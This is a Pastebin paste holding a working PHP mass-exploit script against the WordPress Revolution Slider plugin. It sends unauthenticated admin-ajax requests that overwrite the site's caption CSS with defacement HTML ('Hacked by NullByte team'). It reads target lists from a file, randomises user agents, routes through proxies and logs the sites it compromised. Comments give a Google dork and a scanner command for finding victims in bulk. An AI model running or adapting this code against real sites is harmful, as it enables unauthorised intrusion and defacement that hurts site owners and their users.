SHARE
TWEET

Untitled

a guest May 1st, 2015 2,949 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. # This tool does not exploit Index.php
  4. # Google DORK: inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
  5. # EXECUTE:
  6.     -t : SET TARGET.
  7.     -f : SET FILE TARGETS.
  8.     -p : SET PROXY
  9.     Execute:
  10.                   php exploit.php -t target
  11.                   php exploit.php -f targets
  12.                   php exploit.php -t target -p 'http://localhost:9090'
  13. # Easier to use with GoogleINURLBrazil
  14. ./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --command-all 'php inurl_revslider.php -t _TARGET_'
  15. # SCAN:  https://github.com/googleinurl/SCANNER-INURLBR
  16. # Exemples target:
  17. error_reporting(1);
  18. set_time_limit(0);
  19. ini_set('display_errors', 1);
  20. ini_set('max_execution_time', 0);
  21. ini_set('allow_url_fopen', 1);
  22. ob_implicit_flush(true);
  23. ob_end_flush();
  24. $op_ = getopt('f:t:', array('help::'));
  25. echo "[+] [Exploit]: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL\nhelp: --help\n\n";
  26. $menu = "
  27.     -t : SET TARGET.
  28.     -f : SET FILE TARGETS.
  29.     -p : SET PROXY
  30.     Execute:
  31.                   php exploit.php -t target
  32.                   php exploit.php -f targets
  33.                   php exploit.php -t target -p 'http://localhost:9090'
  34. \n";
  35. echo isset($op_['help']) ? exit($menu) : NULL;
  36. $params = array(
  37.     'target' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : NULL,
  38.     'file' => !not_isnull_empty($op_['t']) && not_isnull_empty($op_['f']) ? $op_['f'] : NULL,
  39.     'proxy' => not_isnull_empty($op_['p']) ? $op_['p'] : NULL,
  40.     'deface' => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'>[ Hacked by NullByte team - #Anonymous ]<br><marque>:)<p style='color: transparent'>",
  41.     'line' => "--------------------------------------------------------------"
  42. );
  43. not_isnull_empty($params['target']) && not_isnull_empty($params['file']) ? exit("[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
  44. not_isnull_empty($params['target']) ? __request($params) . exit() : NULL;
  45. not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
  46. function not_isnull_empty($valor = NULL) {
  47.     RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
  48. }
  49. function __plus() {
  50.     ob_flush();
  51.     flush();
  52. }
  53. function __listTarget($file) {
  54.     $tgt_  = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
  55.     echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
  56.     foreach ($tgt_ as $url) {
  57.         echo "\n[+] [INFO] SCANNING : {$url} \n";
  58.         __plus();
  59.         $file['target'] = $url;
  60.         __request($file) . __plus();
  61.     }
  62. }
  63. function __setUserAgentRandom() {
  64.     $agentBrowser = array('Firefox', 'Safari', 'Opera', 'Flock', 'Internet Explorer', 'Seamonkey', 'Tor Browser', 'GNU IceCat', 'CriOS', 'TenFourFox',
  65.         'SeaMonkey', 'B-l-i-t-z-B-O-T', 'Konqueror', 'Mobile', 'Konqueror', 'Netscape', 'Chrome', 'Dragon', 'SeaMonkey', 'Maxthon', 'IBrowse'
  66.     );
  67.     $agentSistema = array('Windows 3.1', 'Windows 95', 'Windows 98', 'Windows 2000', 'Windows NT', 'Linux 2.4.22-10mdk', 'FreeBSD',
  68.         'Windows XP', 'Windows Vista', 'Redhat Linux', 'Ubuntu', 'Fedora', 'AmigaOS', 'BackTrack Linux', 'iPad', 'BlackBerry', 'Unix',
  69.         'CentOS Linux', 'Debian Linux', 'Macintosh', 'Android', 'iPhone', 'Windows NT 6.1', 'BeOS', 'OS 10.5', 'Nokia', 'Arch Linux',
  70.         'Ark Linux', 'BitLinux', 'Conectiva (Mandriva)', 'CRUX Linux', 'Damn Small Linux', 'DeLi Linux', 'Ubuntu', 'BigLinux', 'Edubuntu'
  71.     );
  72.     $locais = array('cs-CZ', 'en-US', 'sk-SK', 'pt-BR', 'sq_AL', 'sq', 'ar_DZ', 'ar_BH', 'ar_EG', 'ar_IQ', 'ar_JO',
  73.         'ar_KW', 'ar_LB', 'ar_LY', 'ar_MA', 'ar_OM', 'ar_QA', 'ar_SA', 'ar_SD', 'ar_SY', 'ar_TN', 'ar_AE', 'ar_YE', 'ar',
  74.         'be_BY', 'be', 'bg_BG', 'bg', 'ca_ES', 'ca', 'zh_CN', 'zh_HK', 'zh_SG', 'zh_TW', 'zh', 'hr_HR', 'hr', 'cs_CZ', 'cs',
  75.         'da_DK', 'da', 'nl_BE', 'nl_NL', 'nl', 'en_AU', 'en_CA', 'en_IN', 'en_IE', 'en_MT', 'en_NZ', 'en_PH', 'en_SG', 'en_ZA',
  76.         'en_GB', 'en_US', 'en', 'et_EE', 'et', 'fi_FI', 'fi', 'fr_BE', 'fr_CA', 'fr_FR', 'fr_LU', 'fr_CH', 'fr', 'de_AT', 'de_DE'
  77.     );
  78.     return $agentBrowser[rand(0, count($agentBrowser) - 1)] . '/' . rand(1, 20) . '.' . rand(0, 20) . ' (' . $agentSistema[rand(0, count($agentSistema) - 1)] . ' ' . rand(1, 7) . '.' . rand(0, 9) . '; ' . $locais[rand(0, count($locais) - 1)] . ';)';
  79. }
  80. function __request($__) {
  81.     $curlxpl = curl_init();
  82.     curl_setopt($curlxpl, CURLOPT_URL, "{$__['target']}/wp-admin/admin-ajax.php");
  83.     (!is_null($__['proxy']) ? curl_setopt($curlxpl, CURLOPT_PROXY, $__['proxy']) : NULL);
  84.     curl_setopt($curlxpl, CURLOPT_USERAGENT, __setUserAgentRandom());
  85.     curl_setopt($curlxpl, CURLOPT_POST, 1);
  86.     curl_setopt($curlxpl, CURLOPT_POSTFIELDS, array("action" => "revslider_ajax_action","client_action" => "update_captions_css", "data" => $__['deface']));
  87.     curl_setopt($curlxpl, CURLOPT_RETURNTRANSFER, 1);
  88.     curl_setopt($curlxpl, CURLOPT_FOLLOWLOCATION, 1);
  89.     curl_setopt($curlxpl, CURLOPT_SSL_VERIFYPEER, false);
  90.     curl_setopt($curlxpl, CURLOPT_SSL_VERIFYHOST, 0);
  91.     curl_setopt($curlxpl, CURLOPT_COOKIEFILE, 'cookie.log');
  92.     curl_setopt($curlxpl, CURLOPT_COOKIEJAR, 'cookie.log');
  93.     $result = curl_exec($curlxpl) . __plus();
  94.     if (eregi('true', $result)) {
  95.         $h = "{$__['target']}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css";
  96.         echo "[!] [INFO] Success Exploit!\n";
  97.         echo "[!] [INFO] URL FILE MODIFIED: {$h}\n{$__['line']}\n";
  98.         __plus();
  99.         file_put_contents("revslider.txt", "{$h}\n\n", FILE_APPEND);
  100.     } else {
  101.         echo "[!] [FAIL] {$__['target']} : nothing changed \n{$__['line']}\n";
  102.     }
  103.     curl_close($curlxpl);
  104.     unset($curlxpl);
  105. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top